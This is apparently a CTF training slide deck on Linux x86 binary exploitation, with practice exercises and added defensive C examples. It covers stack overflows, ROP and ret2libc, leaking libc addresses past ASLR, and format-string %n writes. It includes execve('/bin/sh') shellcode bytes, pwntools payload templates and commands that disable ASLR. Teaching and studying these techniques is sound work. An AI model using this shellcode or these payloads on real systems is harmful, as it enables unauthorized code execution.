weber-tsai
PWN Basic II
• Ubuntu VM
• practices.tar.gz
• IP / port of the practice services

PWN
Overflow
Outline
• Buffer Overflow
• ROP ( Return Oriented Programming )
• ret2libc
• ret2text
• gadgets
• format string vulnerability
• CTF ( Attack & Defense )
Buffer Overflow

x86 Stack Layout (32-bit frame, higher addresses at the top)

    EBP + 0x0C   Arg 2
    EBP + 0x08   Arg 1
    EBP + 0x04   Return Address
    EBP          saved EBP
    EBP - 0x04   buffer >>
    EBP - 0x08   buffer      (locals grow downward from EBP)
    …
Buffer Overflow

    void Function( arg1, arg2 ) {
        char buffer[16];
        ……
        scanf("%s", buffer);   /* no field width: an input longer than 16 bytes keeps writing past the buffer */
        ……
    }

Prologue (the compiler reserves the 16-byte buffer below EBP; the slide wrote "sub ebp", the instruction is sub esp):

    push ebp
    mov  ebp, esp
    sub  esp, 0x10
    ……

Stack after the prologue:

    EBP + 0x0C   arg2
    EBP + 0x08   arg1
    EBP + 0x04   Return Address
    EBP          saved EBP
    EBP - 0x04   buffer[12..15]
    EBP - 0x08   buffer[8..11]
    EBP - 0x0C   buffer[4..7]
    EBP - 0x10   buffer[0..3]

Input: AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA … (far more than 16 bytes)
Buffer Overflow

Before the overflow:

    EBP + 0x0C   arg2
    EBP + 0x08   arg1
    EBP + 0x04   Return Address
    EBP          saved EBP
    EBP - 0x04   buffer
    EBP - 0x08   buffer
    EBP - 0x0C   buffer
    EBP - 0x10   buffer

After scanf reads "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…":

    EBP + 0x0C   AAAA
    EBP + 0x08   AAAA
    EBP + 0x04   AAAA   <- Return Address is now 0x41414141
    EBP          AAAA   <- saved EBP overwritten
    EBP - 0x04   AAAA
    EBP - 0x08   AAAA
    EBP - 0x0C   AAAA
    EBP - 0x10   AAAA

Function epilogue:

    leave   ; mov esp, ebp ; pop ebp   -> ESP >> the overwritten return address
    ret     ; ret = pop eip            -> EIP = 0x41414141, i.e. jmp AAAA

Control EIP ?
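The overflow above exists because scanf("%s") has no idea how large buffer is. As an added example (not code from the slides), the C program below measures how far a given input would overrun the slide's 16-byte buffer and shows the two bounded forms, scanf with a field width and fgets, that stop at the buffer's end. Input is passed as a string (a memory stream stands in for stdin) so it runs without a terminal; all function names are the example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16   /* char buffer[16] from the slide */

/* Length of the token scanf("%s") would store: it stops only at whitespace or
 * the end of input, never at the end of the buffer, then appends a '\0'. */
size_t scanf_s_token_len(const char *input) {
    size_t n = 0;
    while (input[n] != '\0' && strchr(" \t\n\v\f\r", input[n]) == NULL)
        n++;
    return n;
}

/* 1 if scanf("%s", buffer) on this input would write past a BUF_SIZE buffer. */
int would_overflow(const char *input) {
    return scanf_s_token_len(input) + 1 > BUF_SIZE;   /* +1 for the terminator */
}

/* Hardened form 1: a field width of BUF_SIZE-1 makes scanf stop after 15
 * characters, leaving room for the '\0'. Returns the number of chars stored. */
size_t read_bounded(const char *input, char buffer[BUF_SIZE]) {
    buffer[0] = '\0';
    if (sscanf(input, "%15s", buffer) != 1)   /* 15 == BUF_SIZE - 1, keep them in sync */
        return 0;
    return strlen(buffer);
}

/* Hardened form 2: fgets() takes the buffer size itself and never stores more
 * than size-1 bytes. fmemopen() turns the string into a FILE* like stdin. */
size_t read_bounded_fgets(const char *input, char buffer[BUF_SIZE]) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return 0;
    buffer[0] = '\0';
    if (fgets(buffer, BUF_SIZE, f) != NULL)
        buffer[strcspn(buffer, "\n")] = '\0';   /* fgets keeps the newline; drop it */
    fclose(f);
    return strlen(buffer);
}

/* Small wrappers so the two bounded readers can be checked by length alone. */
size_t bounded_len(const char *input) { char b[BUF_SIZE]; return read_bounded(input, b); }
size_t fgets_len(const char *input)   { char b[BUF_SIZE]; return read_bounded_fgets(input, b); }

int main(void) {
    /* constructed input: 40 'A's, the kind of string the slide feeds to scanf */
    const char *long_input = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    printf("scanf(\"%%s\") would store %zu+1 bytes into %d: overflow=%d\n",
           scanf_s_token_len(long_input), BUF_SIZE, would_overflow(long_input));
    printf("scanf(\"%%15s\") stores %zu chars, fgets stores %zu chars\n",
           bounded_len(long_input), fgets_len(long_input));
    return 0;
}
```

The width in the scanf form has to be maintained by hand whenever BUF_SIZE changes, which is why fgets (or a width generated from the size) is the more robust of the two fixes.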
Buffer Overflow
Practice #1

Step #2

Step #3

    from pwn import *

    r = process('./pratice1')       # binary name as written on the slide
    eip = ??                         # address to return to (left blank on the slide)
    payload = 'a' * ?? + p32(eip)    # ?? = offset from buffer to the saved return address (left blank on the slide)
    r.sendline(payload)
    r.interactive()

Stack diagram from the slide (addresses as drawn there):

    0x8000fec   AAAA
    0x8000ff0   AAAA
    0x8000ff4   AAAA
    0x8000ff8   AAAA
    0x8000ffc   AAAA
    return address:  0x8000f04, the system("/bin/sh") in the binary, or -> jmp esp
    0x8000f00 / 0x8000f04 / 0x8000f08 …   shellcode (when returning through jmp esp)
Buffer Overflow
Practice #2

Step #1
Find Return Address

Step #2
• Stack address?
• gdb? The stack addresses seen under gdb differ from a normal run, because gdb changes the process environment.
• coredump: let the crashing process dump core and read the real stack from the dump
    $ ulimit -c unlimited
    $ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'
• jmp esp

Step #2
jmp esp ?

Step #3
ShellCode
• write it yourself with nasm (DIY)
• bytes that scanf will not pass through must not appear in it: 0x0b, 0x0a, 0x00 … etc.
• shellcode
Step #3

    08048062 <starter>:
     8048062:  31 c0             xor eax,eax
     8048064:  40                inc eax
     8048065:  40                inc eax
     8048066:  40                inc eax
     8048067:  40                inc eax
     8048068:  40                inc eax
     8048069:  40                inc eax
     804806a:  40                inc eax
     804806b:  40                inc eax
     804806c:  40                inc eax
     804806d:  40                inc eax
     804806e:  40                inc eax
     804806f:  31 c9             xor ecx,ecx
     8048071:  51                push ecx
     8048072:  68 2f 2f 73 68    push 0x68732f2f    ; "//sh"
     8048077:  68 2f 62 69 6e    push 0x6e69622f    ; "/bin"
     804807c:  89 e3             mov ebx,esp
     804807e:  31 d2             xor edx,edx
     8048080:  cd 80             int 0x80

Register state at int 0x80:

    eax = 11      (execve)
    ebx = "/bin//sh\x00"
    ecx = 0
    edx = 0
    -> execve("/bin//sh", NULL, NULL)
Step #3

    shellcode = (
        "\x31\xc0\x40\x40"
        "\x40\x40\x40\x40"
        "\x40\x40\x40\x40"
        "\x40\x31\xc9\x51"
        "\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62"
        "\x69\x6e\x89\xe3"   # the slide's string dropped the \x69 of "/bin"; these bytes follow the disassembly above
        "\x31\xd2\xcd\x80"
    )

Step #4
• payload = 'a' * ?? + stack_address + shellcode
• Write Exploit ~~~
DEP (Data Execution Prevention)

The Practice #2 payload as it sits on the stack:

    0xffffcfdc   aaaa
    0xffffcfe0   aaaa
    0xffffcfe4   aaaa
    0xffffcfe8   aaaa
    0xffffcfec   aaaa         (saved EBP)
    0xffffcff0   0xffffcff4   (return address -> the shellcode just above it)
    0xffffcff4   Shell Code
    0xffffcff8   …

With DEP the stack is mapped without execute permission, so returning into shellcode on the stack ...
crashes instead of running it.
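DEP is a property a defender can verify before a binary is deployed: the loader decides the stack's permissions from the PT_GNU_STACK program header, and the same headers reveal PIE and RELRO. As an added example (not code from the slides), this C program reads an ELF64 header and its program headers the way a checksec-style tool does; it builds constructed in-memory images to exercise itself, and when run directly it reports on the file given as argv[1] (defaulting to /proc/self/exe). The struct and function names are the example's own.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct mitigations { int nx, pie, relro; };

/* Parse a little-endian ELF64 image held in memory. Returns 0 on success,
 * -1 if the bytes are not a well-formed ELF64 image. */
int analyze_elf(const unsigned char *img, size_t len, struct mitigations *m) {
    Elf64_Ehdr eh;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 || eh.e_ident[EI_DATA] != ELFDATA2LSB ||
        eh.e_phentsize != sizeof(Elf64_Phdr))
        return -1;
    if (eh.e_phoff > len || (size_t)eh.e_phnum * sizeof(Elf64_Phdr) > len - eh.e_phoff)
        return -1;

    m->pie = (eh.e_type == ET_DYN);  /* ET_DYN also covers shared objects; for an executable it means PIE */
    m->nx = 0;                       /* no PT_GNU_STACK at all: the kernel grants an executable stack */
    m->relro = 0;
    for (size_t i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        memcpy(&ph, img + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) m->nx = !(ph.p_flags & PF_X);  /* DEP: stack without PF_X */
        if (ph.p_type == PT_GNU_RELRO) m->relro = 1;
    }
    return 0;
}

/* Build a minimal constructed ELF64 image (header + program headers, no code)
 * so the analyzer can be exercised offline. Returns the image size, 0 on overflow. */
size_t build_sample(int exec_stack, int pie, int relro, unsigned char *out, size_t cap) {
    Elf64_Ehdr eh;
    Elf64_Phdr ph[2];
    memset(&eh, 0, sizeof eh);
    memset(ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = pie ? ET_DYN : ET_EXEC;
    eh.e_machine = EM_X86_64;
    eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof(Elf64_Phdr);
    int n = 0;
    ph[n].p_type = PT_GNU_STACK;
    ph[n].p_flags = PF_R | PF_W | (exec_stack ? PF_X : 0);
    n++;
    if (relro) { ph[n].p_type = PT_GNU_RELRO; ph[n].p_flags = PF_R; n++; }
    eh.e_phnum = n;
    size_t total = sizeof eh + n * sizeof(Elf64_Phdr);
    if (total > cap) return 0;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, ph, n * sizeof(Elf64_Phdr));
    return total;
}

/* Bit mask nx | pie<<1 | relro<<2 for a constructed sample, -1 on parse error. */
int sample_flags(int exec_stack, int pie, int relro) {
    unsigned char img[256];
    struct mitigations m;
    size_t len = build_sample(exec_stack, pie, relro, img, sizeof img);
    if (analyze_elf(img, len, &m) != 0) return -1;
    return m.nx | (m.pie << 1) | (m.relro << 2);
}

/* 1 if a buffer that is not an ELF image is rejected rather than misreported. */
int rejects_garbage(void) {
    const char *junk = "not an ELF file at all, just some text";
    struct mitigations m;
    return analyze_elf((const unsigned char *)junk, strlen(junk), &m) == -1;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/proc/self/exe";
    FILE *f = fopen(path, "rb");
    if (!f) { perror(path); return 1; }
    unsigned char *buf = malloc(1 << 20);          /* headers sit at the start; 1 MiB is plenty */
    size_t len = buf ? fread(buf, 1, 1 << 20, f) : 0;
    fclose(f);
    struct mitigations m;
    if (analyze_elf(buf, len, &m) != 0) { fprintf(stderr, "%s: not an ELF64 image\n", path); return 1; }
    printf("%s: NX=%s PIE=%s RELRO=%s\n", path,
           m.nx ? "yes" : "no", m.pie ? "yes" : "no", m.relro ? "yes" : "no");
    free(buf);
    return 0;
}
```

A binary reported with NX=no is exactly the Practice #2 situation (shellcode on the stack runs); NX=yes is the situation that forces the ROP techniques on the following slides.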
ROP (Return Oriented Programming)

ROP
• every piece of code used ends in ret, so the next address on the stack decides what runs next:
    ret  ret  ret  ret  ret  ret  ret …
• the whole chain is placed on the stack by the overflow

ROP - ret2libc
• DEP stops code on the stack, but the return address can still point anywhere executable
• return into a function that is already loaded: libc.so
    system("/bin/sh");

ROP - ret2libc (stack after the overflow)

    0xffffcfdc   aaaa
    0xffffcfe0   aaaa
    0xffffcfe4   aaaa
    0xffffcfe8   aaaa
    0xffffcfec   aaaa               (saved EBP)
    0xffffcff0   system             <- return into system
    0xffffcff4   fake ret address   <- where system returns to
    0xffffcff8   "/bin/sh"          <- system's argument
    0xffffcffc
ROP - ret2libc
Practice #3

Step #1
Find Return Address

Step #2
• where is system ?
• where is "/bin/sh" ?
• keep the addresses fixed while practising by turning ASLR off:
    echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Step #3
• Write Payload

    aaaaaaaaaaaaaaaa
    aaaa
    system addr
    fake ret address
    "/bin/sh"
ROP - ret2text
• return into code or PLT entries already present in the binary itself
• without PIE the .text addresses are fixed
• a statically linked binary contains far more code to return into
ROP - gadgets

Short instruction sequences that end in ret:

    pop edx ; ret
    xor eax, eax ; ret
    push esp ; ret
    mov eax, ebx ; ret

ROP - gadgets
• R/W Register:      pop eax ; ret
• R/W Memory:        pop edx ; pop eax ; mov [eax], edx ; ret
• Logical Operation: xor eax, eax ; and eax, ecx

ROP chain

Gadgets found (addresses as on the slide):

    0x080481c9   pop edx ; ret
    0x08043a24   pop eax ; ret

Stack contents written by the overflow:

    0x080481c9   -> pop edx ; ret
    <value>      popped into edx (control edx)
    0x08043a24   -> pop eax ; ret
    <value>      popped into eax (control eax)
    ...
    ...          each ret pops the next address from the stack
ROP - gadgets
Where do the gadgets come from?

ROP - gadgets
ROPgadget.py
https://github.com/JonathanSalwan/ROPgadget
• lists the ret gadgets in a binary
• can build a ROP chain

ROP - gadgets
Practice #4
• ROPgadget
• objdump -d filename
• pipe the output through less ( | less ) to page and search it
ASLR (Address Space Layout Randomization)

ASLR randomizes where these are mapped on every run:
    Stack
    Heap
    Shared Library ……
    libc

ASLR
• cat /proc/<pid>/maps shows every mapped section of a running process
• with ASLR on, the shared libraries, stack and heap move between runs
....
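The maps file is the direct way to see what ASLR moves. As an added example, not code from the slides, the C program below parses /proc/<pid>/maps lines, finds the base of the binary, of libc and of the stack, and compares two constructed snapshots (addresses invented for illustration, not from a real system) to show which mappings move. It also carries the offset arithmetic that the leak-based ret2libc on the later slides relies on, with the libc offsets in the test being invented placeholders as well. Function and struct names are the example's own.

```c
#include <stdio.h>
#include <string.h>

struct mapping {
    unsigned long start, end;
    char perms[5];
    char path[256];   /* empty for anonymous mappings */
};

/* Parse one maps line: "start-end perms offset dev inode [path]". Returns 1 on success. */
int parse_maps_line(const char *line, struct mapping *m) {
    unsigned long offset, inode;
    unsigned int major, minor;
    m->path[0] = '\0';
    int n = sscanf(line, "%lx-%lx %4s %lx %x:%x %lu %255s",
                   &m->start, &m->end, m->perms, &offset, &major, &minor, &inode, m->path);
    return n >= 7;   /* the path column is optional */
}

/* Start address of the first mapping whose path contains `needle`
 * ("libc", "[stack]", the binary's name). maps is sorted by address, so the
 * first hit is the base. Returns 0 if nothing matches. */
unsigned long find_base(const char *maps_text, const char *needle) {
    char line[512];
    const char *p = maps_text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        struct mapping m;
        if (parse_maps_line(line, &m) && strstr(m.path, needle) != NULL)
            return m.start;
        p = nl ? nl + 1 : p + len;
    }
    return 0;
}

/* ASLR moves libc as one block: a leaked address of one function plus the
 * fixed offsets inside that libc build give the address of any other. */
unsigned long libc_symbol_from_leak(unsigned long leaked_addr, unsigned long leaked_off,
                                    unsigned long wanted_off) {
    unsigned long libc_base = leaked_addr - leaked_off;
    return libc_base + wanted_off;
}

/* Constructed maps snapshots of two runs of a non-PIE 32-bit binary.
 * Every address and inode here is invented for the example. */
static const char *RUN1 =
    "08048000-08049000 r-xp 00000000 08:01 131182     /home/ctf/practice5\n"
    "08049000-0804a000 rw-p 00000000 08:01 131182     /home/ctf/practice5\n"
    "f7e0a000-f7fb8000 r-xp 00000000 08:01 12345      /lib32/libc.so.6\n"
    "f7fb8000-f7fb9000 ---p 001ae000 08:01 12345      /lib32/libc.so.6\n"
    "f7fba000-f7fbd000 rw-p 00000000 00:00 0\n"
    "ffd5c000-ffd7d000 rw-p 00000000 00:00 0          [stack]\n";
static const char *RUN2 =
    "08048000-08049000 r-xp 00000000 08:01 131182     /home/ctf/practice5\n"
    "08049000-0804a000 rw-p 00000000 08:01 131182     /home/ctf/practice5\n"
    "f7d2c000-f7eda000 r-xp 00000000 08:01 12345      /lib32/libc.so.6\n"
    "f7eda000-f7edb000 ---p 001ae000 08:01 12345      /lib32/libc.so.6\n"
    "f7edc000-f7edf000 rw-p 00000000 00:00 0\n"
    "ff8a1000-ff8c2000 rw-p 00000000 00:00 0          [stack]\n";

unsigned long base_in_run1(const char *needle) { return find_base(RUN1, needle); }

/* 1 if `needle` is mapped at a different address in the two runs (ASLR moved it). */
int moves_between_runs(const char *needle) {
    return find_base(RUN1, needle) != find_base(RUN2, needle);
}

int main(void) {
    const char *names[] = { "practice5", "libc.so.6", "[stack]" };
    for (int i = 0; i < 3; i++)
        printf("%-10s run1=%08lx run2=%08lx %s\n", names[i],
               find_base(RUN1, names[i]), find_base(RUN2, names[i]),
               moves_between_runs(names[i]) ? "moves (ASLR)" : "fixed");
    return 0;
}
```

Run against a live process (cat /proc/<pid>/maps piped into find_base) the same parser shows the binary fixed at 0x08048000 while libc and the stack change on every start, which is what the Practice #5 leak has to work around.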
ASLR
The ret2libc payload needs the addresses of system and "/bin/sh", and both live in libc, which now moves:

    0xffffcfdc   aaaa
    0xffffcfe0   aaaa
    0xffffcfe4   aaaa
    0xffffcfe8   aaaa
    0xffffcfec   aaaa               (saved EBP)
    0xffffcff0   system             <- address unknown under ASLR
    0xffffcff4   fake ret address
    0xffffcff8   "/bin/sh"          <- address unknown under ASLR
    0xffffcffc

ASLR
• ASLR moves libc, so the addresses of system, gadgets … inside libc are unknown in advance
• ... but libc is mapped as one block: once one address inside it is known, the rest follow from fixed offsets

ASLR
How to get one address inside libc ?

system
• Libc is loaded at a random base
• the offset of every function inside the same libc build is fixed
• got.plt: the binary's GOT holds the real libc addresses of the functions it has already called
• so leak a GOT entry and add the distance from that function to system …
• overflow the binary into a call of puts / write / fwrite …… through the PLT, with a GOT entry as argument, so the entry is printed to stdout
• read the leaked GOT value
• compute system and the address of "/bin/sh"
• overflow again and call system("/bin/sh")

First payload (leak):

    aaaaaaaaaa….
    plt_write         <- return into write@plt
    vulner_function   <- where write returns: back into the vulnerable function for a second overflow
    0                 <- write's first argument
    got_write         <- second argument: the GOT entry to leak
    4                 <- third argument: 4 bytes

Second payload:

    aaaaaaaaaa….
    system            <- computed from the leak
    0                 <- fake return address
    &"/bin/sh"        <- system's argument
ASLR
Practice #5
• pwntools parses the ELF binary: ELF(path)
• ELF.symbols[func_name] gives a symbol's address, ELF.plt[func_name] the PLT entry
• ELF.got[function_name] gives the GOT entry
• leak a GOT entry with puts
• then call system("/bin/sh")
format string Vulnerability
... ... XD

scanf / printf
• printf takes a format string, and so does scanf
• … when user input is used as the printf format string, the user chooses the directives
• %n ..?

%n
• %n writes the number of characters printed so far into the int its argument points to
• Ex.
• printf("12345%n", &a);
• 5 characters were printed, so a = 5
• a format string containing %n therefore writes to memory
• %hn %hhn
• %n   writes 4 bytes (int)
• %hn  writes 2 bytes (short)
• %hhn writes 1 byte (byte)
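The %n behaviour just described can be watched safely with snprintf. As an added example that is not on the slides, the C code below reproduces printf("12345%n", &a) giving a = 5, shows the 1-, 2- and 4-byte widths of %hhn, %hn and %n on a little-endian machine (x86, as in the slides), adds a small checker that counts format directives in untrusted data and flags %n as a detection heuristic, and shows the safe call printf("%s", user) that the vulnerable form printf(user) lacks. Function and union names are the example's own.

```c
#include <stdio.h>
#include <string.h>

/* The slide's example: after "12345" has been produced, %n stores 5 in a.
 * snprintf is used so nothing reaches the terminal. */
int demo_n_count(void) {
    char buf[32];
    int a = -1;
    snprintf(buf, sizeof buf, "12345%n", &a);
    return a;   /* 5 */
}

/* Width of the write: %hhn touches 1 byte, %hn 2 bytes, %n 4 bytes of the
 * pointed-to object. The union makes the byte-level effect visible. */
union word { unsigned int u; short s[2]; signed char c[4]; };

unsigned int demo_hhn(void) {
    char buf[32];
    union word w;
    w.u = 0xdeadbeefu;
    snprintf(buf, sizeof buf, "12345%hhn", &w.c[0]);   /* only the lowest byte becomes 5 */
    return w.u;   /* 0xdeadbe05 on little-endian */
}

unsigned int demo_hn(void) {
    char buf[32];
    union word w;
    w.u = 0xdeadbeefu;
    snprintf(buf, sizeof buf, "12345%hn", &w.s[0]);    /* the low 16 bits become 5 */
    return w.u;   /* 0xdead0005 on little-endian */
}

/* Detection heuristic for untrusted data that is about to become a format
 * string: count conversion directives ("%%" is a literal percent and is
 * skipped). Any count above 0 means the data steers printf; a %n means it
 * can write memory. */
int count_directives(const char *s, int *has_n) {
    int count = 0;
    if (has_n) *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        count++;
        /* skip flags, width, precision, positional "$" and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*hlLqjzt$", *q) != NULL) q++;
        if (*q == 'n' && has_n) *has_n = 1;
    }
    return count;
}

int count_only(const char *s)    { int n; return count_directives(s, &n); }
int writes_memory(const char *s) { int n; count_directives(s, &n); return n; }

/* The fix (not shown on the slides): never pass user data as the format.
 * "%s" prints the bytes literally, so directives in them are inert. */
int safe_echo(const char *user, char *out, size_t cap) {
    return snprintf(out, cap, "%s", user);
}

/* 1 if safe_echo reproduces the input byte for byte. */
int safe_echo_is_literal(const char *user) {
    char out[128];
    safe_echo(user, out, sizeof out);
    return strcmp(out, user) == 0;
}

int main(void) {
    const char *untrusted = "AAAA%x%x%n";   /* constructed sample input */
    printf("a = %d after \"12345%%n\"\n", demo_n_count());
    printf("%%hhn -> %08x, %%hn -> %08x\n", demo_hhn(), demo_hn());
    printf("\"%s\": %d directives, writes memory: %d\n",
           untrusted, count_only(untrusted), writes_memory(untrusted));
    return 0;
}
```

Compilers already help with the fix: gcc's -Wformat-security warns on any printf whose format is not a literal, which catches printf(user) at build time.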
IO Wrapper

IO Wrapper
• wraps the service binary for CTF Attack & Defense
• flag

IO Wrapper
• output: printf, puts …… etc
• input: scanf, gets ...... etc

IO Wrapper
    IO Wrapper -> Process 1
               -> Process 2
               -> Process …
• the wrapper is a socket server; for each connection it starts the service binary with execvp as a child process

IO Wrapper
• how to start the child ?
• fork()

    pid_t pid = fork();
    if ( pid == 0 ) {
        /* sub process */
        execvpe(…);
    } else {
        /* parent */
    }
IO Wrapper
• how does the wrapper reach the child's stdin/stdout ?
• pipe
• pipe: create it with pipe(), then dup2() it onto the child's fd 0 / fd 1 before the exec

IO Wrapper
• naive relay loop (the slide's second fread read stdin again; it has to read the child's stdout):

    while ( true ) {
        fread(buf, 1, n, stdin);                   /* may block */
        fwrite(buf, 1, n, stdin_of_sub_process);
        fread(buf, 1, n, stdout_of_sub_process);   /* may block */
        fwrite(buf, 1, n, stdout);
    }

IO Blocked: each fread waits on one side while the other side may already have data, so the loop gets stuck.

select

IO Wrapper
• select() and pselect() allow a program to monitor multiple file descriptors, waiting until one or more of the file descriptors become "ready" for some class of I/O operation (e.g., input possible). A file descriptor is considered ready if it is possible to perform a corresponding I/O operation (e.g., read(2) without blocking, or a sufficiently small write(2)).
http://man7.org/linux/man-pages/man2/select.2.html
• a file descriptor (fd) is the number of an open file, pipe or socket
• select() returns as soon as one of the watched fds is ready, so the following read will not block

select
fd
select example: http://goo.gl/RKIOeO
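The fork, pipe, dup2 and select pieces above fit together as follows. This C program is an added example and not the deck's wrapper: the child is reduced to an echo loop where the real wrapper would execvp() the service binary, and the client side is a pipe pre-loaded with constructed input where the real wrapper has the accepted socket. Both directions are relayed in one select() loop, so a quiet side never blocks the other.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/wait.h>
#include <unistd.h>

/* Child side. In the real wrapper this is where execvp() of the service goes;
 * here the child just echoes stdin to stdout so the example runs stand-alone. */
static void child_main(void) {
    char buf[256];
    ssize_t n;
    while ((n = read(STDIN_FILENO, buf, sizeof buf)) > 0)
        if (write(STDOUT_FILENO, buf, (size_t)n) != n) _exit(1);
    _exit(0);
}

/* Relay `input` (standing in for client traffic) to the child's stdin and
 * collect the child's stdout into `out`. Returns bytes collected, -1 on error
 * or if nothing happens for 5 seconds. */
ssize_t relay(const char *input, size_t inlen, char *out, size_t cap) {
    int client[2], to_child[2], from_child[2];
    if (pipe(client) || pipe(to_child) || pipe(from_child)) return -1;
    /* Constructed client traffic, written up front (must fit the pipe buffer);
     * in the real wrapper this end is the accepted socket. */
    if (write(client[1], input, inlen) != (ssize_t)inlen) return -1;
    close(client[1]);

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                          /* sub process */
        dup2(to_child[0], STDIN_FILENO);     /* child reads what the wrapper forwards */
        dup2(from_child[1], STDOUT_FILENO);  /* child's output flows back to the wrapper */
        close(client[0]); close(to_child[0]); close(to_child[1]);
        close(from_child[0]); close(from_child[1]);
        child_main();                        /* execvp(service_path, argv) would replace this */
    }
    close(to_child[0]); close(from_child[1]);   /* parent keeps only its own ends */

    int cfd = client[0], ofd = from_child[0], wfd = to_child[1];
    size_t got = 0;
    int ok = 1;
    while (ok && (cfd >= 0 || ofd >= 0)) {
        fd_set rs;
        FD_ZERO(&rs);
        int maxfd = -1;
        if (cfd >= 0) { FD_SET(cfd, &rs); maxfd = cfd; }
        if (ofd >= 0) { FD_SET(ofd, &rs); if (ofd > maxfd) maxfd = ofd; }
        struct timeval tv = { 5, 0 };        /* give up if neither side is ready for 5 s */
        if (select(maxfd + 1, &rs, NULL, NULL, &tv) <= 0) { ok = 0; break; }

        char buf[256];
        if (cfd >= 0 && FD_ISSET(cfd, &rs)) {        /* client -> child */
            ssize_t n = read(cfd, buf, sizeof buf);
            if (n <= 0) {                            /* client hung up: pass EOF on to the child */
                close(cfd); cfd = -1; close(wfd); wfd = -1;
            } else if (write(wfd, buf, (size_t)n) != n) {
                ok = 0;
            }
        }
        if (ofd >= 0 && FD_ISSET(ofd, &rs)) {        /* child -> client */
            ssize_t n = read(ofd, buf, sizeof buf);
            if (n <= 0) { close(ofd); ofd = -1; }    /* child exited: its stdout is done */
            else {
                size_t k = (size_t)n < cap - got ? (size_t)n : cap - got;
                memcpy(out + got, buf, k);           /* real wrapper: write(client_socket, buf, n) */
                got += k;
            }
        }
    }
    if (cfd >= 0) close(cfd);
    if (wfd >= 0) close(wfd);
    if (ofd >= 0) close(ofd);
    if (!ok) kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return ok ? (ssize_t)got : -1;
}

/* Helpers for checking: bytes relayed back, and whether they came back intact. */
long relay_len(const char *s) {
    char out[1024];
    return (long)relay(s, strlen(s), out, sizeof out);
}
int relay_roundtrip_ok(const char *s) {
    char out[1024];
    ssize_t n = relay(s, strlen(s), out, sizeof out - 1);
    if (n < 0) return 0;
    out[n] = '\0';
    return strcmp(out, s) == 0;
}

int main(void) {
    char out[1024];
    const char *msg = "hello wrapper\n";     /* constructed client input */
    ssize_t n = relay(msg, strlen(msg), out, sizeof out);
    printf("relayed %zd bytes: %.*s", n, (int)n, out);
    return n < 0;
}
```

The same loop is where a defending team's wrapper logs or filters traffic: every byte in either direction passes through the parent, so a copy can go to a log file before being forwarded.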
LD_PRELOAD

LD_PRELOAD
• LD_PRELOAD
• names a shared library the dynamic loader maps before every other library
• its symbols therefore take precedence over the same names in libc

LD_PRELOAD
• mylib.c

    #include <stddef.h>
    #include <stdio.h>

    /* replaces libc's puts for any program started with LD_PRELOAD=./mylib.so
       (the slide leaves the body empty; this body is a filled-in example) */
    int puts(const char * str) {
        return fprintf(stdout, "[mylib] %s\n", str);
    }

LD_PRELOAD
• main.c

    #include <stdlib.h>
    #include <stdio.h>

    int main(int argc, char * argv[]) {
        puts("Hello World");
        return 0;
    }

LD_PRELOAD
• $ gcc -Wall -fpic -shared -o mylib.so mylib.c
• $ gcc -o main main.c
• $ LD_PRELOAD=./mylib.so ./main
  (set on the same command line or exported; an assignment on its own line, as the slide shows it, affects nothing)
Reference
• http://drops.wooyun.org/tips/6597
• AIS3 Binary Exploit
• http://pwntools.readthedocs.org/en/latest/dynelf.html
• http://www.slideshare.net/hackstuff/rop-40525248